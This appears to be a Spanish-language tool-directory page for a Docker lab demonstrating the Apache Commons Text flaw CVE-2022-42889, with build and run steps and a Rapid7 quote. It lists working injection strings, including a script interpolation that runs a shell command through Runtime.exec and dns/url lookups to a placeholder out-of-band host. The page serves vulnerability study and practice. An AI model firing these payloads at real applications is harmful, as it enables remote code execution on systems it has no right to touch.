Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-42889 — docker para CVE-2022-42889 | Kitploit
Herramientas/GitHubGitHub/necroteddy/cve-2022-42889
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubnecroteddy/cve-2022-42889

CVE-2022-42889

docker para CVE-2022-42889

Ver Repositorio
1hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-42889-POC

Una aplicación de demostración simple que muestra cómo explotar la vulnerabilidad CVE-2022-42889.
Utiliza servicios OOB (Fuera de Banda) para demostrar los prefijos dns y url.

JavaDocs para la interpolación de commons-text commons-text JavaDocs

Ejemplos de interpolaciones

  • script:javascript ("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/blop')}")
  • dns ("${dns:address|HOST}")
  • url ("${url:UTF-8:http://HOST")

Cita de Rapid7

La vulnerabilidad ha sido comparada con Log4Shell ya que es una vulnerabilidad a nivel de biblioteca de código abierto que probablemente afecte a una amplia variedad de aplicaciones de software que utilizan el objeto relevante.
Sin embargo, el análisis inicial indica que esta es una mala comparación. La naturaleza de la vulnerabilidad significa que, a diferencia de Log4Shell, será raro que una aplicación utilice el componente vulnerable de Commons Text para procesar entradas no confiables y potencialmente maliciosas.

Requisitos previos

  • docker
  • java
  • maven

Java y maven pueden omitirse si se obtiene la imagen desde Docker Hub

Uso

Compilar aplicación

root@kitploit:~
mvn clean package

Construir imagen docker

root@kitploit:~
docker build -t cve-2022-42889-poc .

Ejecutar imagen docker

Descargar herramienta
root@kitploit:~
docker run --rm -p 8081:8081 -t cve-2022-42889-poc

Acceder a la aplicación y seguir las instrucciones

root@kitploit:~
open http://localhost:8081

Más información

  • NIST NVD
  • Rapid 7